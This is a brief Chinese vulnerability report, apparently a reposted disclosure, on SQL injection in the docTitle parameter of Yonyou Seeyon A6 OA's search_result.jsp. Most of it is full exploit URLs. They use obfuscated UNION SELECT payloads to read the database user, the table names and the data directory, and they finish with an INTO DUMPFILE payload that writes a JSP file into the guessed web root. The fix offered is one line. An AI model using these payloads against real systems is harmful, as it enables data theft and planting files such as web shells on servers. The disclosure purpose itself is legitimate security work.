注入发生在search_result. jsp 文件中的docTitle参数
http://xxxxxx测试数据/yyoa/oaSearch/search_result.jsp?docType=协同信息&docTitle=1'and/**/1=2/**/ union/**/all/**/select/**/user(),2,3,4,5%23&goal=1&perId=0&startTime=&endTime=&keyword=&searchArea=notArc 查询表名: http:// xxxxxx测试数据 /yyoa/oaSearch/search_result.jsp?docType=协同信息&docTitle=test'and/**/1=2/**/union/**/all/**/select/**/group_concat(table_name),2,3,4,5/**/from/**/information_schema.tables%23&goal=1&perId=0&startTime=&endTime=&keyword=&searchArea=notArc 由于程序是集成默认安装,能够猜测到WEB路径: http://xxxxxx测试数据/yyoa/oaSearch/search_result.jsp?docType=协同信息&docTitle=test'and/**/1=2/**/union/**/all/**/select/**/@@datadir,2,3,4,5%23&goal=1&perId=0&startTime=&endTime=&keyword=&searchArea=notArc 根据网上查到的OA安装路径资料,拼接出WEB路径为: d:\UFseeyon\OA\tomcat\webapps\yyoa 直接dumpfile文件: http://xxxxxx测试数据/yyoa/oaSearch/search_result.jsp?docType=协同信息&docTitle=test'and/**/1=2/**/union/**/all/**/select/**/'test',2,3,4,5/**/into/**/dumpfile/**/'d:/UFseeyon/OA/tomcat/webapps/yyoa/test.jsp'/**/from/**/ mysql .user/**/limit/**/1%23&goal=1&perId=0&startTime=&endTime=&keyword=&searchArea=notArc 修复方案: 过滤危险字符
查看更多关于用友致远A6协同管理SQL注射 - 网站安全 - 自学ph的详细内容...